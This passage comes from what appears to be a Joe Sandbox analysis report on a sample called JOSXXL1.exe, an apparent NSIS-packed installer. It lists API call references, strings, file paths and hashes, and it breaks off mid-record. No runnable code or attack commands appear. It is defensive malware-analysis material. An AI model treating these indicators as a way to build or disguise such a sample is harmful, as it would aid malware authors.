                                                                                                        • Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3472027048-0
                                                                                                        • Opcode ID: 6ae527e6cc94f5f5e8d5a49a66ee65cacad6fe88e42295e5ff3276528536477d
                                                                                                        • Instruction ID: 754004f40eea7f16e1f379b15ffb2f72bdee5afc6285ec4f51c34af4300ec48c
                                                                                                        • Opcode Fuzzy Hash: 6ae527e6cc94f5f5e8d5a49a66ee65cacad6fe88e42295e5ff3276528536477d
                                                                                                        • Instruction Fuzzy Hash: 2DD01277B14100DBD720EFB9BF89C6F73A8EB513293204837D942E11A2D57DD852862D
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404C76
                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404C81
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CDE
                                                                                                        • SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00404D54
                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404EAE
                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040507E
                                                                                                        • GlobalFree.KERNEL32(?), ref: 0040508E
                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 0040522D
                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405238
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1638840714-813528018
                                                                                                        • Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                        • Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
                                                                                                        • Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                        • Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404731
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0040475B
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040480C
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404817
                                                                                                        • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404849
                                                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404855
                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867
                                                                                                          • Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                          • Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                          • Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945
                                                                                                          • Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                          • Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
                                                                                                          • Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: A$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call$H7B$\d
                                                                                                        • API String ID: 2624150263-3848520769
                                                                                                        • Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                        • Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
                                                                                                        • Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                        • Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69
                                                                                                        APIs
                                                                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4227406936-0
                                                                                                        • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                        • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00402154
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInstance
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 542301482-3036879226
                                                                                                        • Opcode ID: cf94c7b7cb7f03cb1db79e66d9edf1813590421b21ba1cbe0db7abe7f4c0e10f
                                                                                                        • Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
                                                                                                        • Opcode Fuzzy Hash: cf94c7b7cb7f03cb1db79e66d9edf1813590421b21ba1cbe0db7abe7f4c0e10f
                                                                                                        • Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: ff5730ae288ebb4c2c7f72d00f03721da9664918cf6f8891babb7f0252882a05
                                                                                                        • Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
                                                                                                        • Opcode Fuzzy Hash: ff5730ae288ebb4c2c7f72d00f03721da9664918cf6f8891babb7f0252882a05
                                                                                                        • Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A
                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404496
                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
                                                                                                        • GetSysColor.USER32(?), ref: 004044C4
                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
                                                                                                        • lstrlenW.KERNEL32(?), ref: 004044E5
                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404560
                                                                                                        • SendMessageW.USER32(00000000), ref: 00404567
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404592
                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
                                                                                                        • SetCursor.USER32(00000000), ref: 004045E6
                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404607
                                                                                                        • SetCursor.USER32(00000000), ref: 0040460A
                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                        • String ID: Call$N$[C@$\d$open
                                                                                                        • API String ID: 3615053054-3784353869
                                                                                                        • Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                        • Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
                                                                                                        • Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                        • Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9
                                                                                                        APIs
                                                                                                        • lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
                                                                                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE
                                                                                                          • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                          • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                        • GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
                                                                                                        • wsprintfA.USER32 ref: 00405F29
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
                                                                                                        • SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406012
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00406019
                                                                                                          • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                          • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                        • String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
                                                                                                        • API String ID: 222337774-3510403337
                                                                                                        • Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                        • Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
                                                                                                        • Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                        • Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                        • String ID: F
                                                                                                        • API String ID: 941294808-1304234792
                                                                                                        • Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                        • Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
                                                                                                        • Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                        • Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                        • String ID: @Hmu
                                                                                                        • API String ID: 4216380887-887474944
                                                                                                        • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                        • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                        • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                        • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                        • CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                        • CharNextW.USER32(0040A230,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                        • CharPrevW.USER32(0040A230,0040A230,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\JOSXXL1.exe", xrefs: 0040645B
                                                                                                        • *?|<>/":, xrefs: 00406469
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406418
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-2125738232
                                                                                                        • Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                        • Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
                                                                                                        • Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                        • Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004042CB
                                                                                                        • GetSysColor.USER32(00000000), ref: 004042E7
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 004042F3
                                                                                                        • SetBkMode.GDI32(?,?), ref: 004042FF
                                                                                                        • GetSysColor.USER32(?), ref: 00404312
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00404322
                                                                                                        • DeleteObject.GDI32(?), ref: 0040433C
                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404346
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                        • Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
                                                                                                        • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                        • Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54
                                                                                                        APIs
                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                          • Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                        • String ID: 9
                                                                                                        • API String ID: 163830602-2366072709
                                                                                                        • Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                        • Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
                                                                                                        • Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                        • Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                        • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                        • wsprintfW.USER32 ref: 00402E06
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                          • Part of subcall function 00402D83: MulDiv.KERNEL32(000556D4,00000064,0005ACF8), ref: 00402D98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 722711167-2449383134
                                                                                                        • Opcode ID: 6f4a503913ef8ebb725cac2aff158102153f5ef9f377251618bd95ec040e3a6b
